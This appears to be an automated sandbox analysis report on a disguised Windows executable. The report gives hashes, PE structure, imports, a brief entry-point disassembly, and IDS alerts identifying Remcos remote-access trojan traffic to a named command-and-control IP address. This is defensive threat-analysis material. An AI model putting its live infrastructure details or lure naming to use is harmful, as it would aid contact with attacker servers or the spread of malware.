                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                          File name:Nutzen_Unterschrift_Planen#2024.com.exe
                                                          File size:814'515 bytes
                                                          MD5:50ad24c74502951d0bec1507ca050c46
                                                          SHA1:392235b1cf28c1e5e5c4ce98922b472d80fb8d0c
                                                          SHA256:e4ed3892cc2c77e7de57a5fc47040118740b1a672747f72193ed065570a55b38
                                                          SHA512:e06ac807482380f9b1986f1b064ee215716095aac4350d9427baeeda5a6bfc4a302b048788a3d187e9131620f032e0a6476cbff5f6db9eb2420a56ecbaade5d8
                                                          SSDEEP:24576:twh/C6tZbwDaudTLF9AMWR9hoRR7jKzjrh:twE6tZ6dT/A5ORlKzj1
                                                          TLSH:3D0512457A30E586C6BC863055B3D46C8A364D346C722A8F77B4BB8C3972749F29F24E
                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!`G.@...@...@../OQ..@...@..I@../OS..@...c>..@..+F...@..Rich.@..........................PE..L...b..Y.................d....:....
                                                          Icon Hash:8c07010123078f11
                                                          Entrypoint:0x403350
                                                          Entrypoint Section:.text
                                                          Digitally signed:false
                                                          Imagebase:0x400000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                          Time Stamp:0x597FCC62 [Tue Aug 1 00:33:38 2017 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:
                                                          OS Version Major:4
                                                          OS Version Minor:0
                                                          File Version Major:4
                                                          File Version Minor:0
                                                          Subsystem Version Major:4
                                                          Subsystem Version Minor:0
                                                          Import Hash:b34f154ec913d2d2c435cbd644e91687
                                                          Instruction
                                                          sub esp, 000002D4h
                                                          push ebx
                                                          push esi
                                                          push edi
                                                          push 00000020h
                                                          pop edi
                                                          xor ebx, ebx
                                                          push 00008001h
                                                          mov dword ptr [esp+14h], ebx
                                                          mov dword ptr [esp+10h], 0040A2E0h
                                                          mov dword ptr [esp+1Ch], ebx
                                                          call dword ptr [004080A8h]
                                                          call dword ptr [004080A4h]
                                                          and eax, BFFFFFFFh
                                                          cmp ax, 00000006h
                                                          mov dword ptr [007A8A2Ch], eax
                                                          je 00007F01C8CFA413h
                                                          push ebx
                                                          call 00007F01C8CFD6A9h
                                                          cmp eax, ebx
                                                          je 00007F01C8CFA409h
                                                          push 00000C00h
                                                          call eax
                                                          mov esi, 004082B0h
                                                          push esi
                                                          call 00007F01C8CFD623h
                                                          push esi
                                                          call dword ptr [00408150h]
                                                          lea esi, dword ptr [esi+eax+01h]
                                                          cmp byte ptr [esi], 00000000h
                                                          jne 00007F01C8CFA3ECh
                                                          push 0000000Ah
                                                          call 00007F01C8CFD67Ch
                                                          push 00000008h
                                                          call 00007F01C8CFD675h
                                                          push 00000006h
                                                          mov dword ptr [007A8A24h], eax
                                                          call 00007F01C8CFD669h
                                                          cmp eax, ebx
                                                          je 00007F01C8CFA411h
                                                          push 0000001Eh
                                                          call eax
                                                          test eax, eax
                                                          je 00007F01C8CFA409h
                                                          or byte ptr [007A8A2Fh], 00000040h
                                                          push ebp
                                                          call dword ptr [00408044h]
                                                          push ebx
                                                          call dword ptr [004082A0h]
                                                          mov dword ptr [007A8AF8h], eax
                                                          push ebx
                                                          lea eax, dword ptr [esp+34h]
                                                          push 000002B4h
                                                          push eax
                                                          push ebx
                                                          push 0079FEE0h
                                                          call dword ptr [00408188h]
                                                          push 0040A2C8h
                                                          Programming Language:
                                                          • [EXP] VC++ 6.0 SP5 build 8804

| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0x84fc | 0xa0 | .rdata |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x3e3000 | 0x31350 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x2b0 | .rdata |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |

| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|---|
| .text | 0x1000 | 0x63c8 | 0x6400 | c9574a66dc77d8f1daec393ec45a9340 | False | 0.6766015625 | data | 6.504099201068482 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .rdata | 0x8000 | 0x138e | 0x1400 | 2914bac53cd4485c9822093463e4eea6 | False | 0.4509765625 | data | 5.146454805063938 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .data | 0xa000 | 0x39eb38 | 0x600 | b58a1c46e0546d467ecde7b7f51a5ac7 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .ndata | 0x3a9000 | 0x3a000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .rsrc | 0x3e3000 | 0x31350 | 0x31400 | 1a5e30c8ed816e683bafacf9b70f6fb3 | False | 0.45309029980964466 | data | 5.127644529748264 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |

| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
|---|---|---|---|---|---|---|
| RT_ICON | 0x3e3388 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 67584 | English | United States | 0.26761209038211287 |
| RT_ICON | 0x3f3bb0 | 0x94a8 | Device independent bitmap graphic, 96 x 192 x 32, image size 38016 | English | United States | 0.3500105108261509 |
| RT_ICON | 0x3fd058 | 0x8ea4 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.9976996385146237 |
| RT_ICON | 0x405f00 | 0x5488 | Device independent bitmap graphic, 72 x 144 x 32, image size 21600 | English | United States | 0.37846580406654345 |
| RT_ICON | 0x40b388 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | English | United States | 0.367737364194615 |
| RT_ICON | 0x40f5b0 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.4378630705394191 |
| RT_ICON | 0x411b58 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.47373358348968103 |
| RT_ICON | 0x412c00 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | English | United States | 0.5426229508196722 |
| RT_ICON | 0x413588 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.625 |
| RT_DIALOG | 0x4139f0 | 0x120 | data | English | United States | 0.5138888888888888 |
| RT_DIALOG | 0x413b10 | 0x11c | data | English | United States | 0.6056338028169014 |
| RT_DIALOG | 0x413c30 | 0xc4 | data | English | United States | 0.5918367346938775 |
| RT_DIALOG | 0x413cf8 | 0x60 | data | English | United States | 0.7291666666666666 |
| RT_GROUP_ICON | 0x413d58 | 0x84 | data | English | United States | 0.7348484848484849 |
| RT_VERSION | 0x413de0 | 0x230 | data | English | United States | 0.5464285714285714 |
| RT_MANIFEST | 0x414010 | 0x340 | XML 1.0 document, ASCII text, with very long lines (832), with no line terminators | English | United States | 0.5540865384615384 |

| DLL | Import |
|---|---|
| KERNEL32.dll | SetEnvironmentVariableW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, SetCurrentDirectoryW, GetFileAttributesW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, ExitProcess, GetShortPathNameW, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalLock, GlobalUnlock, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW |
| USER32.dll | GetSystemMenu, SetClassLongW, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, GetDC, SetTimer, SetWindowTextW, LoadImageW, SetForegroundWindow, ShowWindow, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, CreateDialogParamW, SendMessageTimeoutW, wsprintfW, PostQuitMessage |
| GDI32.dll | SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor |
| SHELL32.dll | SHGetSpecialFolderLocation, ShellExecuteExW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW |
| ADVAPI32.dll | AdjustTokenPrivileges, RegCreateKeyExW, RegOpenKeyExW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey, RegSetValueExW, RegQueryValueExW, RegEnumKeyW |
| COMCTL32.dll | ImageList_Create, ImageList_AddMasked, ImageList_Destroy |
| ole32.dll | OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance |

| Language of compilation system | Country where language is spoken | Map |
|---|---|---|
| English | United States | |

| Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2024-09-27T12:58:43.810496+0200 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.11.20 | 49783 | 66.150.198.142 | 80 | TCP |
| 2024-09-27T12:58:45.334039+0200 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.11.20 | 49784 | 66.150.198.142 | 2700 | TCP |
| 2024-09-27T12:58:46.349101+0200 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.11.20 | 49786 | 66.150.198.142 | 2700 | TCP |
| 2024-09-27T12:58:46.395551+0200 | 2803304 | ETPRO MALWARE Common Downloader Header Pattern HCa | 3 | 192.168.11.20 | 49785 | 178.237.33.50 | 80 | TCP |

Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                          Sep 27, 2024 12:58:44.160057068 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.160119057 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.160171032 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.160202026 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.160295963 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.160355091 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.160357952 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.160357952 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.160357952 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.160358906 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.160358906 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.160412073 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.160469055 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.160562038 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.160562038 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.160729885 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.160757065 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.160816908 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.160909891 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.160990000 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.161046028 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.161067009 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.161067009 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.161102057 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.161158085 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.161212921 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.161242962 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.161242962 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.161268950 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.161324978 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.161379099 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.161417007 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.161417007 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.161417007 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.161417007 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.161493063 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.161550045 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.161587954 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.161587954 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.161588907 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.161607027 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.161715984 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.161745071 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.161773920 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.161829948 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.161885977 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.161919117 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.161919117 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.161919117 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.161940098 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.162034988 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.162085056 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.162108898 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.162167072 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.162224054 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.162257910 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.162257910 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.162278891 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.162334919 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.162389994 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.162406921 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.162408113 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.162444115 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.162499905 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.162554026 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.162583113 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.162583113 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.162583113 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.162583113 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.162583113 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.162610054 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.162667990 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.162723064 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.162729979 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.162729979 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.162777901 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.162832975 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.162888050 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.162915945 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.162942886 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.162998915 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.163053036 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.163089991 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.163089991 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.163089991 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.163089991 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.163146019 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.163213968 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.163254976 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.163254976 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.163269997 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.163326025 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.163381100 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.163429976 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.163434982 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.163490057 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.163543940 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.163595915 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.163603067 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.163657904 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.163712025 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.163767099 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.163769007 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.163769007 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.163769007 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.163769007 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.163769960 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.163821936 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.163876057 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.163930893 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.163933992 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.163933992 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.163986921 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.164040089 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.164093971 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.164105892 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.164149046 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.164278030 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.164278030 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.164278984 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.164278984 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.164278984 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.164278984 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.164417028 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.275702953 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.275784969 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.275846958 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.275906086 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.275932074 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.275964975 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.276026011 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.276087046 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.276094913 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.276149035 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.276259899 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.276428938 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.276428938 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.276428938 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.283941984 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.284136057 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.284584999 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.284668922 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.284728050 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.284786940 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.284796953 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.284832001 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.284919977 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.285015106 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.285024881 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.285026073 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.285106897 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.285162926 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.285177946 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.285250902 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.285306931 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.285342932 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.285342932 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.285397053 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.285451889 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.285511971 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.285518885 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.285588026 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.285645008 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.285686016 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.285686016 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.285686016 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.285686016 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.285686016 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.285763979 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.285820961 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.285852909 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.285852909 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.285912037 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.285969019 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.286026955 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.286034107 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.286102057 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.286158085 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.286194086 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.286194086 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.286194086 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.286195040 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.286266088 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.286320925 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.286362886 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.286362886 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.286411047 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.286468029 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.286524057 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.286534071 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.286535025 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.286608934 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.286664963 CEST804978366.150.198.142192.168.11.20
